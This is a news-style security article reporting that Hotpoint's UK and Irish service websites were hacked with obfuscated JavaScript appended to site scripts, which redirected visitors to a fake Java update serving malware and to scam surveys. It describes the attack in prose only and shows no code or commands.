Hotpoint service sites hacked

Hotpoint's UK service website has been hacked. Instead of allowing customers to activate warranties, book services or find an engineer, the site is currently putting its customers at risk by redirecting them to a variety of dubious websites.

Some visitors were presented with a fake Java update page, which downloaded malware.

Some Hotpoint visitors are being redirected to a fake Java update page, which downloads malware.

The hacker has accomplished this feat by appending malicious JavaScript code to several of the scripts hosted on the Hotpoint service site. It was not readily apparent how the hacker gained write-access to these files, but the WordPress content management system that the site runs on is notorious for being compromised if both it and its plugins are not kept up to date.

The hack has also affected Hotpoint's Irish service website, which is hosted on the same IP address as the UK one.

The malicious code appended by the attacker. This appears at the end of an otherwise-legitimate script which asks the user whether they want to accept cookies from the site

The malicious code appended by the attacker. This appears at the end of an otherwise-legitimate script which asks the customer whether they want to accept cookies from the site.

The appended code is obfuscated to make its purpose less apparent, perhaps in the hope that nobody would dare to delete it. De-obfuscating the code reveals that it is responsible for loading a larger obfuscated script from an external site.

The externally hosted malicious script pretends to be an innocuous jQuery file; but scrolling down reveals its true content, which is obfuscated.

The externally hosted malicious script pretends to be an innocuous jQuery file; but scrolling down reveals its true content, which is obfuscated.

Presumably, this external site is operated by the hacker, in which case he has the opportunity to change the content of his malicious payload at will. Any visitor to the Hotpoint service site could consequently be at risk of much more serious attacks, such as drive-by malware or phishing.

Hotpoint service customers are also being redirected to scam survey sites like this one.

Many bank holiday shoppers who buy Hotpoint white goods are likely to fall victim to this attack, as the paperwork included with new appliances directs new customers to the site to activate their 10 year parts guarantee.

Thanks Tim

New customers are directed to the hacked site.

Existing customers desperate to find out about certain models of dangerous tumble dryers are also likely to be snared by the JavaScript attack.

Generally, the Easter bank holiday weekend is a good time for hackers to strike UK websites, as many people will be on holiday on both Good Friday and the following Monday. The longer the attacker can keep his redirection code in place, the more revenue he can reap.

Of course, there could be wider-reaching repercussions to this attack – if an attacker has been able to modify scripts on Hotpoint's website, then he could also have been in a position to view any data stored or transmitted by the site.